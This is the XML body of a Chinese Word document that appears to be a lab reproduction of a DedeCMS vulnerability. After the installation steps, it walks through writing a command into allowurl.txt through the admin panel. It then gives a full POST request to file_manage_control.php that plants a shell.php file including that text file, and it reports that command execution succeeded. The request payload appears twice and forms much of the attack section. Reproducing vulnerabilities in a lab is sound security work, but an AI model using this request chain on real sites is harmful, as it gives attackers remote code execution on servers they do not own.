          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>ttp://localhost/install/index.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C595CF3" w14:textId="442B5C35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进入安装界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D2E8D" w14:textId="336FB423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5F5E5F2E" w14:textId="427657F4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5119093A" w14:textId="4883CAE4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</w:p>
    <w:p w14:paraId="030B57FC" w14:textId="6B1A0FF5" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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C8F22A" wp14:editId="571985FA">
            <wp:extent cx="5274310" cy="33902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2842" w14:textId="64D2D419" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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2A428530" wp14:editId="10F36769">
            <wp:extent cx="5274310" cy="42506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C2B0" w14:textId="73D5384D" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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继续下一步安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DDCBB2" w14:textId="1ACA87A6" w:rsidR="003A78D9" w:rsidRDefault="009A6E42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现在进行设置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MySQL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密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2AE83" w14:textId="65DA280E" w:rsidR="009A6E42" w:rsidRDefault="009A6E42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打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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phpStudy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，并按照图片顺序重新设置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MySQL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密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F8D6E" w14:textId="263A517F" w:rsidR="009A6E42" w:rsidRDefault="009A6E42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A82029" wp14:editId="35EB7D7F">
            <wp:extent cx="5274310" cy="39090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3F3E" w14:textId="5725509E" w:rsidR="009A6E42" w:rsidRDefault="009A6E42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506B07B9" wp14:editId="35141D99">
            <wp:extent cx="3047619" cy="129523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9E6E" w14:textId="33420B16" w:rsidR="009A6E42" w:rsidRDefault="009A6E42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578532EE" wp14:editId="2BFFA862">
            <wp:extent cx="2847619" cy="10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206A" w14:textId="44E9B1FF" w:rsidR="009A6E42" w:rsidRDefault="009A6E42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现在我们将新的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MySQL</w:t>
      </w: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密码填入安装程序中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545E6232" w14:textId="73C7BE01" w:rsidR="009A6E42" w:rsidRDefault="009A6E42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8C7938A" wp14:editId="195F302C">
            <wp:extent cx="5274310" cy="57956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2B24" w14:textId="6499DCAD" w:rsidR="009A6E42" w:rsidRDefault="009A6E42">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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继续下一步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB3D4A0" w14:textId="7C33B0FD" w:rsidR="009A6E42" w:rsidRDefault="009A6E42">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial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27BDB787" wp14:editId="07F5CFDB">
            <wp:extent cx="5274310" cy="20212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801F" w14:textId="65D81AF9" w:rsidR="009A6E42" w:rsidRPr="003A78D9" w:rsidRDefault="009A6E42" w:rsidP="009A6E42">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>安装完毕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B18CCD" w14:textId="72D00DF8" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc11219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1A736B51" w14:textId="280D725F" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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【步骤一】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64063AED" w14:textId="57AD7D93" w:rsidR="005B758B" w:rsidRDefault="009A6E42" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10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切换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B7649E" w14:textId="43C8985E" w:rsidR="009A6E42" w:rsidRDefault="009A6E42" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"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1004AA2" wp14:editId="6C28C0BF">
            <wp:extent cx="5274310" cy="45250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1A6E" w14:textId="2BBC3590" w:rsidR="009A6E42" w:rsidRDefault="00627A6A" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>后续的操作需要切换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5FA675" w14:textId="77777777" w:rsidR="00627A6A" w:rsidRDefault="00627A6A" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A160D0" w14:textId="57505887" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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【步骤二】</w:t>
      </w:r>
      <w:r w:rsidR="00A061CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>登录后台管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA7DD97" w14:textId="6BECC2A5" w:rsidR="00A061CB" w:rsidRDefault="00A061CB" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A061CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A061CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A061CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A061CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>article_allowurl_edit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74F41725" w14:textId="747253AE" w:rsidR="00A061CB" w:rsidRDefault="00A061CB" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0"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01256E" wp14:editId="0D745E26">
            <wp:extent cx="5274310" cy="42970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315F" w14:textId="7DE541AF" w:rsidR="00D727C5" w:rsidRDefault="00A061CB" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0"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FEB5A1" wp14:editId="04850389">
            <wp:extent cx="5274310" cy="45364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C923" w14:textId="63692F08" w:rsidR="00A061CB" w:rsidRDefault="00A061CB" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10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输入命令并确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D2BD978" wp14:editId="7642B30C">
            <wp:extent cx="4295238" cy="117142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2584" w14:textId="6327E079" w:rsidR="00A061CB" w:rsidRDefault="009E77A9" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10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获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB670A" w14:textId="77777777" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F5C102" w14:textId="77777777" w:rsidR="00A061CB" w:rsidRDefault="00A061CB" w:rsidP="00A061CB">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D368ABD" w14:textId="2E4B47A6" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9A3291" w14:textId="66795B9D" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BC853A" w14:textId="534FF130" w:rsidR="002B6FB5" w:rsidRDefault="002B6FB5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE4A697" w14:textId="19086514" w:rsidR="002B6FB5" w:rsidRDefault="002B6FB5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E0C9FB3" w14:textId="05546446" w:rsidR="00D727C5" w:rsidRDefault="002B6FB5" w:rsidP="00C14A5F">
      <w:pPr>
        <w:pStyle w:val="10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上传恶意插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6194B9" w14:textId="1EF589C7" w:rsidR="004C1793" w:rsidRDefault="004C1793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【步骤三】</w:t>
      </w:r>
      <w:r w:rsidR="009E77A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E77A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E77A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E77A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>po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77A9" w14:paraId="00499857" w14:textId="77777777" w:rsidTr="009E77A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA6C1D0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>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>dede</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>file_manage_control.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E66179C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>Host: X.X.X.X</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA4ADB7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>Cache-Control: max-age=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A90AA4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>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0A0227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 xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3401846F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>Accept: text/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>html,application</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39427050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 xml:space="preserve">Accept-Encoding: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44DB8CAC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 xml:space="preserve">Accept-Language: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>zh-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CN,zh</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>;q</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>=0.9,ak;q=0.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B073A2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 xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>menuitems</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">=1_1%2C2_1%2C3_1; PHPSESSID=1aiacudvg5ett0sie1hldrsirp; _csrf_name_f6248c53=b78d93a8fa8ca918ce43981d99fef4fe; _csrf_name_f6248c531BH21ANI1AGD297L1FF21LN02BGE1DNG=c1395807345a5866; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DedeUserID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=ebfa2a04dd016f07; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DedeLoginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>=1685497822; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=508a22baef9e1b61</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D50DCD3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>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="323475BA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>Content-Type: application/x-www-form-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>urlencoded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="219529B4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>Content-Length: 139</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726D9CA7" w14:textId="77777777" w:rsidR="009E77A9" w:rsidRP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</w:p>
          <w:p w14:paraId="4F1C0070" w14:textId="5B9ABC1B" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="009E77A9">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:ind w:firstLine="562"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">fmdo=edit&amp;backurl=&amp;token=&amp;activepath=&amp;filename=shell.php&amp;str=&lt;?php </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Include_once</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>("./data/admin/allowurl.txt")</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>; ?</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E77A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&gt;&amp;B1=++%E4%BF%9D+%E5%AD%98++</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4769DED7" w14:textId="2192B059" w:rsidR="009E77A9" w:rsidRDefault="009E77A9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可以现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>路径下抓包，然后复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>那一段，然后修改请求方式为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>，修改请求路径，将</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D33D9E" w14:textId="580AF14A" w:rsidR="009E77A9" w:rsidRPr="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="009E77A9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77EFA871" w14:textId="77777777" w:rsidR="009E77A9" w:rsidRPr="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="009E77A9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="562"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13840B1F" w14:textId="36D77F72" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="009E77A9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">fmdo=edit&amp;backurl=&amp;token=&amp;activepath=&amp;filename=shell.php&amp;str=&lt;?php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Include_once</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>("./data/admin/allowurl.txt")</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E77A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;&amp;B1=++%E4%BF%9D+%E5%AD%98++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044110E9" w14:textId="4136A3AE" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="009E77A9">
      <w:pPr>
        <w:pStyle w:val="10"/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这一段添加到末尾即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58395B0E" w14:textId="508569CD" w:rsidR="005F1959" w:rsidRDefault="009E77A9" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/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938BA29" wp14:editId="3DC1DFEF">
            <wp:extent cx="5274310" cy="279781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A387" w14:textId="09C9CBF3" w:rsidR="005F1959" w:rsidRDefault="009E77A9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此时我们发现靶机的网站目录创建了一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA1DEEE" w14:textId="572AEC32" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0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24B42C55" wp14:editId="1199868D">
            <wp:extent cx="5274310" cy="34702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034F" w14:textId="551A402A" w:rsidR="00C14A5F" w:rsidRDefault="009E77A9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访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B1C5FD9" w14:textId="337F8B34" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/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170090E" wp14:editId="212C171E">
            <wp:extent cx="5274310" cy="298831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14C" w14:textId="025A0609" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0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52A6283D" wp14:editId="38E1D52E">
            <wp:extent cx="5274310" cy="29083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BDA4" w14:textId="4ABC1429" w:rsidR="00C14A5F" w:rsidRDefault="00C14A5F" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3061A8DE" w14:textId="00221633" w:rsidR="005F1959" w:rsidRDefault="00BC4C3E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命令执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DFD84" w14:textId="776B0B60" w:rsidR="00961F8D" w:rsidRDefault="009E77A9" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>命令文件为步骤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保存的超链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A05809" w14:textId="55DDC0C2" w:rsidR="009E77A9" w:rsidRDefault="009E77A9" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
